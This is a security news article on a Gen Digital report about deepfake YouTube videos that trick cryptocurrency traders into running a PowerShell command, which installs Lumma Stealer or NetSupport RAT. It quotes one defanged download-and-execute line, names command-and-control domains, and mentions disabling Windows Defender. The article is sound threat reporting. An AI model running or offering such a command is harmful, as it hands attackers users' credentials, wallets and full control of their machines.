New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake

A new wave of “Scam-Yourself” attacks leveraging AI-generated deepfake videos and malicious scripts is targeting cryptocurrency enthusiasts and financial traders, marking a dangerous evolution in social engineering tactics. Discovered by cybersecurity researchers at Gen Digital, this campaign exploits verified YouTube channels, synthetic personas, and AI-crafted payloads to manipulate victims into compromising their own systems. The […] The post New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake appeared first on Cyber Security News.

Feb 19, 2025 - 11:56
 0
New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake

A new wave of “Scam-Yourself” attacks leveraging AI-generated deepfake videos and malicious scripts is targeting cryptocurrency enthusiasts and financial traders, marking a dangerous evolution in social engineering tactics.

Discovered by cybersecurity researchers at Gen Digital, this campaign exploits verified YouTube channels, synthetic personas, and AI-crafted payloads to manipulate victims into compromising their own systems.

AI-generated video hosted in Youtube video with the ‘Scam-Yourself’ instructions included (Source – GenDigital)

The attacks—which saw a 614% surge in Q3/2024—combine cutting-edge deepfake technology with psychologically tailored lures, raising urgent concerns about the weaponization of generative AI in cybercrime.

While the security analysts noted that the operation begins with a deepfake video hosted on a compromised YouTube channel boasting 110,000 subscribers.

The video features a synthetic persona named “Thomas Harris” or “Thomas Roberts,” created using advanced facial animation, voice synthesis, and body movement replication.

Synthetic persona (Source – GenDigital)

Despite the channel’s legitimate appearance—including repurposed content from TradingView—the unlisted tutorial video instructs viewers to activate a fictitious “AI-powered developer mode” that purportedly predicts cryptocurrency market trends with 97% accuracy.

From Deepfakes to PowerShell Payloads

The attack’s core lies in its use of AI-generated scripts designed to bypass suspicion.

Viewers are guided to open Windows’ Run dialog (Win+R) and execute a PowerShell command that fetches a malicious script from paste-sharing sites like Pastefy[.]com or Obin[.]net.

A representative payload decrypted by researchers shows attackers using ChatGPT to refine their code:-

iex (New-Object Net.WebClient).DownloadString('hxxps://pastefy[.]com/raw/AbCdE123')  

This script connects to a command-and-control (C&C) server—recently tracked as developer-update[.]dev or developerbeta[.]dev—to deploy Lumma Stealer or NetSupport Remote Access Tool (Figure 2).

Video showing how to insert the (malicious) script into the command prompt (Source – GenDigital)

The former harvests cryptocurrency wallets and browser credentials, while the latter grants full system control. Forensic analysis revealed SHA-256 hashes for key components, including:

  • a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797 (malicious PowerShell script)
  • 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e (Lumma Stealer variant)

Crucially, the deepfake video hide its artificial nature through procedural details—a synthetic voice explains how to bypass Windows Defender by adding registry exclusions, while on-screen keystrokes mirror authentic TradingView workflows.

Attackers further amplify reach through YouTube’s sponsored ad system, targeting users watching legitimate financial content.

Unlike traditional phishing, victims actively participate in their compromise, believing they’re accessing exclusive tools. With cybercriminals now automating persona creation and script refinement, verifying digital instructions through multiple channels has become a non-negotiable security practice.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting – Register Here

The post New Wave of ‘Scam-Yourself’ Attacks Utilizing AI-Generated Videos With DeepFake appeared first on Cyber Security News.